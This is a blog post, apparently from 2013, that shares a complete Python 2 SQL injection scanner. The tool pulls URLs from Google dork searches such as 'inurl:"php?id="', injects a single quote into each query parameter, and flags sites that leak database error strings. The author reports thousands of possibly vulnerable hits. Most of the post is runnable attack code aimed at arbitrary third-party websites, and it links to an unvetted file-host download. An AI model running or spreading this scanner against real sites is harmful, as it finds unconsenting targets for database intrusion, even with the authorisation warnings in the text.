16 thg 8, 2013

SQL Injection Scanner

I coded this a long time ago; it was the first tool I wrote in Python, purely to learn the language. It is not very complex, but it does a reasonable job anyway. Note that it is Python 2 code (`print` statements, `urllib2`), so it will not run unmodified on Python 3.
Here's the code:

#!/usr/bin/python #    Copyright (C) 2010 <xrrrx@ymail.com> #    This program is free software: you can redistribute it and/or modify #    it under the terms of the GNU General Public License as published by #    the Free Software Foundation, either version 3 of the License, or #    at your option) any later version. #     #    This program is distributed in the hope that it will be useful, #    but WITHOUT ANY WARRANTY; without even the implied warranty of #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the #    GNU General Public License for more details. #     #    You should have received a copy of the GNU General Public License #    along with this program.  If not, see <http://www.gnu.org/licenses/>. 
import argparse
from itertools import count
from multiprocessing import Process
import sys
import time
import urllib2

from xgoogle.search import GoogleSearch, SearchError

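# Error-message fragments that indicate a database error leaked into the
# response body.  checkSQLiStr() does a plain, case-sensitive substring search
# for each entry, so every string must be spelled exactly as the server emits
# it.  Grouped by the backend/driver that produces the message; the "GENERIC"
# ones are shared by several engines.
#
# NOTE(review): "Division by zero in" and "Call to a member function" are PHP
# warnings/fatals rather than database messages.  They often follow a failed
# query, but they also occur for unrelated application bugs, so a hit on one
# of them deserves manual confirmation before being called an injection.
strSQLi = [
    "error in your SQL syntax",                  # GENERIC
    "Syntax error at",                           # GENERIC
    "You have an error in your SQL",             # MYSQL
    "Division by zero in",                       # MYSQL (PHP warning, weak signal)
    "not a valid MySQL result",                  # MYSQL
    "Call to a member function",                 # MYSQL (PHP fatal, weak signal)
    "Microsoft JET Database",                    # MSACCESS
    "ODBC Microsoft Access Driver",              # MSACCESS
    "Microsoft OLE DB Provider for SQL Server",  # MSSQL
    "Unclosed quotation mark",                   # MSSQL
    "Microsoft OLE DB Provider for Oracle",      # ORACLE
    "Macromedia][SQLServer JDBC Driver]",        # COLDFUSION
]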

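def split(alist, wanted_parts=1):
    """Split *alist* into *wanted_parts* contiguous slices.

    Slices are as even as integer division allows; any remainder lands in
    the last slice, and a list shorter than ``wanted_parts`` yields empty
    slices so the caller can still hand exactly one slice to each worker.

    Args:
        alist: the sequence to partition (any sliceable sequence works).
        wanted_parts: number of slices to return; must be >= 1.

    Returns:
        A list of ``wanted_parts`` slices whose concatenation equals ``alist``.

    Raises:
        ValueError: if ``wanted_parts`` is less than 1.  The original divided
            by zero for 0 and silently returned ``[]`` for negative values,
            which would have left main() spawning no workers at all.
    """
    if wanted_parts < 1:
        raise ValueError("wanted_parts must be >= 1, got %r" % (wanted_parts,))
    length = len(alist)
    return [alist[k * length // wanted_parts:(k + 1) * length // wanted_parts]
            for k in range(wanted_parts)]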

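def _fetchBody(url, timeout):
    """Fetch *url* and return the response body as a string.

    An HTTPError (4xx/5xx) is not treated as a failure: its body is returned
    too, because a leaked database error is commonly served with HTTP 500 and
    the original code threw those replies away (urlopen raises on them).
    Any other exception (DNS failure, connection refused, socket timeout, ...)
    propagates to the caller, which reports it per target.

    Args:
        url: the URL to request, already carrying the probe payload.
        timeout: socket timeout in seconds for connect/read.
    """
    try:
        response = urllib2.urlopen(url, timeout=timeout)
    except urllib2.HTTPError as err:
        try:
            return err.read()
        except Exception:
            # NOTE(review): an HTTPError may carry no body (fp is None);
            # there is nothing to inspect in that case.
            return ""
    try:
        return response.read()
    finally:
        response.close()


def checkSQLi(results, i, timeout=15):
    """Worker body: probe every URL in ``results[i]`` for error-based SQLi.

    For each search hit a single ``'`` is appended to every query-string
    value (``a=1&b=2`` becomes ``a='1&b='2``), the page is fetched, and the
    body is handed to checkSQLiStr().  Findings are printed to stdout only;
    nothing is written to disk.  Verbosity comes from the module-level
    ``args`` (a one-character string in ``'0'..'2'``, so the ``>= '1'``
    tests below are single-character string comparisons).

    Only the query string is modified.  The original replaced every ``=`` in
    the whole URL, which also mangled ``=`` characters in the path.  A URL
    without a ``?key=value`` query is skipped.

    Args:
        results: the list of per-worker slices produced by split().
        i: index of this worker's slice in ``results``.
        timeout: per-request socket timeout in seconds; without one a host
            that never answers hangs this worker and the join() in main().

    Returns:
        False always (kept for the original interface; the function runs
        inside a multiprocessing.Process, whose return value is discarded).

    Every request sent here is a deliberate malformed-input probe: run this
    only against hosts you are authorised to test.
    """
    for result in results[i]:
        url = result.url
        if args.verbose >= '2':
            print("[INFO] Testing URL: %s" % url)

        base, sep, query = url.partition("?")
        if not sep or "=" not in query:
            if args.verbose >= '2':
                print("[INFO] No params available for injection for: %s" % url)
            continue
        probe = base + sep + query.replace("=", "='")

        try:
            html = _fetchBody(probe, timeout)
        except KeyboardInterrupt:
            return False
        except Exception as e:
            # Network-level failures are per-target and non-fatal; report
            # and move on rather than killing the whole worker.
            if args.verbose >= '1':
                print("[ERROR] %s" % e)
            continue

        # NOTE(review): a signature in the probed page is only "possible":
        # pages that merely talk about SQL errors match too.  Comparing
        # against the unmodified URL's body would cut those false positives.
        if checkSQLiStr(html):
            print("[INFO] URL: %s" % url)
            print("       Possible vulnerable!")
        elif args.verbose >= '1':
            print("[INFO] URL: %s" % url)
            print("       Not vulnerable.")

    return False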

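def checkSQLiStr(html, signatures=None):
    """Return True if any database error signature occurs in *html*.

    A plain, case-sensitive substring test against each entry of
    ``signatures`` (defaults to the module-level ``strSQLi`` list), so it
    only catches messages spelled exactly as listed there.

    Args:
        html: response body as returned by ``response.read()``.  ``None`` or
            an empty body counts as "no signature found" instead of raising,
            since a worker may hand over an empty read.
        signatures: optional iterable of substrings to look for; defaults to
            ``strSQLi``.  Passing an explicit list makes the check usable
            with other signature sets and in unit tests.

    Returns:
        bool
    """
    if not html:
        return False
    checks = strSQLi if signatures is None else signatures
    return any(checkStr in html for checkStr in checks)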

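def _scanResults(allResults):
    """Fan one page of search hits out to ``args.threads`` worker processes.

    Each worker receives one slice from split() and runs checkSQLi() on it;
    the call returns once every worker has exited.  Workers rely on
    inheriting the module-level ``args`` (fork start method); on a
    spawn-based platform the settings would have to be passed explicitly.
    """
    splitResults = split(allResults, args.threads)
    processes = [Process(target=checkSQLi, args=(splitResults, n))
                 for n in range(args.threads)]
    if args.verbose >= '1':
        print("[INFO] Starting %d threads..." % args.threads)
    for p in processes:
        p.start()
    for p in processes:
        p.join()


def main():
    """Drive the Google search and dispatch each result page to the workers.

    Pages ``args.page`` .. ``args.stop - 1`` are fetched one at a time
    (100 results each) and fully scanned before the next page is requested.
    The original parsed ``-s`` but never used it; the bound here is
    exclusive.  A SearchError (xgoogle's exception for a failed or blocked
    Google request) is retried up to ``args.retry`` times with a growing
    pause.  The page counter lives in this function rather than being
    re-created from ``args.page`` on every retry, so a retry resumes at the
    page that failed; the original re-scanned from the start page and, since
    it reset its counter after every successful page, could never reach the
    retry cap while the first page kept succeeding.

    Exits the process on completion, on exhausting retries, or on Ctrl-C.
    Uses the module-level ``args`` set up under ``__main__``.
    """
    tries = 0
    nextPage = args.page
    print("[INFO] Google query: %s" % args.keyword)
    while True:
        try:
            if tries > 0:
                if args.verbose >= '1':
                    print("[WARNING] (%d) Retrying google search query" % tries)
                if tries >= args.retry:
                    if args.verbose >= '1':
                        print("[ERROR] Maximum retries reached...")
                    sys.exit()
                # Back off before hitting Google again: an immediate retry
                # after a block/timeout is the surest way to stay blocked.
                time.sleep(5 * tries)
            tries += 1

            googleSearch = GoogleSearch(args.keyword)
            googleSearch.results_per_page = 100
            while nextPage < args.stop:
                # Set the page explicitly before every fetch so the bound above
                # holds whether or not xgoogle advances .page internally.
                googleSearch.page = nextPage
                allResults = googleSearch.get_results()
                if not allResults:
                    break  # no more result pages for this query
                _scanResults(allResults)
                nextPage += 1
                tries = 0
            print("Finished...")
            sys.exit()
        except SearchError as e:
            if args.verbose >= '2':
                print("[ERROR] Search failed: %s" % e)
            continue
        except KeyboardInterrupt:
            print("Suspended by user...")
            sys.exit()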

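if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        description="Google-dork driven scanner for error-based SQL injection "
                    "(single-quote trigger, error-string detection).",
        epilog="Only scan hosts you are authorised to test.")
    # Verbosity is deliberately kept as a one-character string: the rest of
    # the file compares args.verbose against '1' / '2'.  A list of choices is
    # used instead of the string '012', which argparse would also accept
    # multi-character values like '01' for (substring membership).
    parser.add_argument('-v', dest='verbose', default='0',
                        help='Verbosity level', choices=['0', '1', '2'])
    parser.add_argument('-p', dest='page', type=int, default=0,
                        help='Start google search from page')
    parser.add_argument('-s', dest='stop', type=int, default=5,
                        help='Stop at -s page')
    parser.add_argument('-r', dest='retry', type=int, default=4,
                        help='Amount of times to retry after google search timeout')
    parser.add_argument('-t', dest='threads', type=int, default=2,
                        help='Threads for checking SQLi in query results')
    group = parser.add_argument_group('required arguments')
    group.add_argument('-k', dest='keyword', required=True,
                       help='Keywords to use on google query')
    # Module-level on purpose: checkSQLi() in the worker processes reads it.
    # That only works where Process forks (the workers inherit this module
    # state); a spawn-based start method would need args passed explicitly.
    args = parser.parse_args()

    # split() and the Process fan-out need at least one worker, and a stop
    # page at or before the start page would scan nothing.
    if args.threads < 1:
        parser.error("-t must be at least 1")
    if args.retry < 1:
        parser.error("-r must be at least 1")
    if args.stop <= args.page:
        parser.error("-s must be greater than -p")

    print("Starting...")
    main()
    sys.exit()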

Required libraries:

argparse (http://argparse.googlecode.com/svn/trunk/argparse.py — only needed on Python older than 2.7, where it is not in the standard library) and xgoogle (https://github.com/pkrumins/xgoogle). xgoogle needs fixes for current Google result markup; you can patch it yourself or download a patched copy from http://www.mediafire.com/?7a175lzzipm3x3s — but treat that file-host download as untrusted code: diff it against the upstream GitHub version before running it, since it executes with your user's privileges and makes network requests on your behalf.

Usage:

usage: scanner.py [-h] [-v {0,1,2}] [-p PAGE] [-s STOP] [-r RETRY]
                  [-t THREADS] -k KEYWORD

optional arguments:
  -h, --help   show this help message and exit
  -v {0,1,2}   Verbosity level
  -p PAGE      Start google search from page
  -s STOP      Stop at -s page
  -r RETRY     Amount of times to retry after google search timeout
  -t THREADS   Threads for checking SQLi in query results

required arguments:
  -k KEYWORD   Keywords to use on google query

Example:

./scanner.py -k 'somekeyword inurl:"php?id="' -t 5 -v 1


xargs can be used to feed google dorks from a file.

It scrapes Google results for the keyword you give it and tests each hit for SQL injection. It only checks for error-based injection using a single-quote trigger; the plan was to add more injection methods, more search engines and other features, but I never continued development. Even so it gave me thousands of "possibly vulnerable" hits — bear in mind that a hit only means a database error string appeared in the response, which also happens on pages that merely talk about SQL errors, so every result needs manual confirmation; and probing hosts you are not authorised to test is unlawful in most jurisdictions.

So if someone would like to improve it or add some feature please share it.

+ Lưu file trên với đuôi .py (*.py). Cần cài Python 2 trước khi dùng — mã dùng `print` dạng câu lệnh và `urllib2` nên không chạy trên Python 3 — cùng hai thư viện nêu ở phần Required libraries.
+ Có Readme Kèm Theo + Example
+ Lưu ý: mã ở trên chỉ in site lỗi ra màn hình (stdout), không tự lưu thành file txt; muốn lưu thì chuyển hướng đầu ra, ví dụ `./scanner.py ... > ketqua.txt`.

Nguồn: VNCno1
